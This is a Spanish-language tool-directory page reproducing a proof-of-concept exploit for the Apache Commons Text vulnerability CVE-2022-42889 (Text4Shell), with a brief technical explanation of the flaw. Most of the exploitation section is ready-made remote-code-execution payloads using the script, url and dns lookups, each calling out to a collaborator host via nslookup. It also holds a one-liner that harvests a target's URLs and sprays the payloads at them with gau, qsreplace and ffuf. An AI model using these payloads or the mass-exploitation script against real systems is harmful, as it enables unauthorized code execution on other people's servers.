Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2022-42889-text4shell — Apache commons text - exploit de prueba de concepto de CVE-2022-42889 Text4Shell. | Kitploit
Herramientas/GitHubGitHub/kljunowsky/cve-2022-42889-text4shell
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de Penetración
GitHubkljunowsky/cve-2022-42889-text4shell

CVE-2022-42889-text4shell

Apache commons text - exploit de prueba de concepto de CVE-2022-42889 Text4Shell.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
578hace 2 añosRevisado por Kitploit

CVE-2022-42889-text4shell 🔥🔥🔥

Apache commons text - Prueba de concepto del exploit CVE-2022-42889 Text4Shell.

Detalles📃

CVE-2022-42889 afecta a las versiones 1.5 a 1.9 de Apache Commons Text. Se ha corregido a partir de la versión 1.10 de Commons Text

La vulnerabilidad se ha comparado con Log4Shell, ya que es una vulnerabilidad a nivel de biblioteca de código abierto que probablemente afecte a una amplia variedad de aplicaciones de software que utilizan el objeto correspondiente. Sin embargo, el análisis inicial indica que se trata de una mala comparación. La naturaleza de la vulnerabilidad implica que, a diferencia de Log4Shell, será raro que una aplicación utilice el componente vulnerable de Commons Text para procesar entradas no confiables y potencialmente maliciosas.

Análisis técnico

La vulnerabilidad existe en el objeto interpolador StringSubstitutor. Un interpolador se crea mediante el método StringSubstitutor.createInterpolator() y permite búsquedas de cadenas tal como se definen en StringLookupFactory. Esto se puede utilizar pasando una cadena “${prefix:name}” donde el prefijo es la búsqueda antes mencionada. El uso de las búsquedas “script”, “dns” o “url” permitiría que una cadena manipulada ejecute scripts arbitrarios cuando se pasa al objeto interpolador.

Si bien es poco probable que este fragmento de código específico exista en aplicaciones de producción, la preocupación es que en algunas aplicaciones la variable pocstring pueda estar controlada por el atacante. En este sentido, la vulnerabilidad recuerda a Log4Shell. Sin embargo, el interpolador StringSubstitutor se usa considerablemente menos que la sustitución de cadenas vulnerable en Log4j, y la naturaleza de dicho interpolador implica que es menos probable que una entrada manipulada llegue al objeto vulnerable que simplemente interactuar con dicha cadena manipulada, como en Log4Shell.

Explotación👨‍💻

Manual🛠️

script:javascript

Reemplaza el valor del parámetro con el payload:

root@kitploit:~
${script:javascript:java.lang.Runtime.getRuntime().exec('nslookup COLLABORATOR-HERE')}
root@kitploit:~
https://your-target.com/exploit?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27nslookup%20COLLABORATOR-HERE%27%29%7d

url

root@kitploit:~
${url:UTF-8:java.lang.Runtime.getRuntime().exec('nslookup COLLABORATOR-HERE')}
root@kitploit:~
https://your-target.com/exploit?search=%24%7Burl%3AUTF-8%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27nslookup%20COLLABORATOR-HERE%27%29%7d

dns

root@kitploit:~
${dns:address:java.lang.Runtime.getRuntime().exec('nslookup COLLABORATOR-HERE')}
root@kitploit:~
https://your-target.com/exploit?search=%24%7Bdns%3Aaddress%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27nslookup%20COLLABORATOR-HERE%27%29%7d

Explotación masiva ⛓️

payloads.txt

root@kitploit:~
${script:javascript:java.lang.Runtime.getRuntime().exec('nslookup COLLABORATOR-HERE')}

${url:UTF-8:java.lang.Runtime.getRuntime().exec('nslookup COLLABORATOR-HERE')}

${dns:address:java.lang.Runtime.getRuntime().exec('nslookup COLLABORATOR-HERE')}
root@kitploit:~
for payload in $(cat payloads.txt|sed 's/ COLLABORATOR-HERE/SPACEid.burpcollaborator.com/g'); do echo TARGET.com | gau --blacklist ttf,woff,svg,png | qsreplace "$payload" | sed 's/SPACE/%20/g' | grep "java.lang.Runtime.getRuntime" >> payloads-final.txt;done && ffuf -w payloads-final.txt -u FUZZ

¡Buena caza!💸

Requisitos🧰

ffuf ¡Gracias @joohoi!

qsreplace ¡Gracias @tomnomnom!

gau ¡Gracias @lc!

Contacto📇

LinkedIn Twitter - Milan Jovic

LinkedIn - Milan Jovic

Descargar herramienta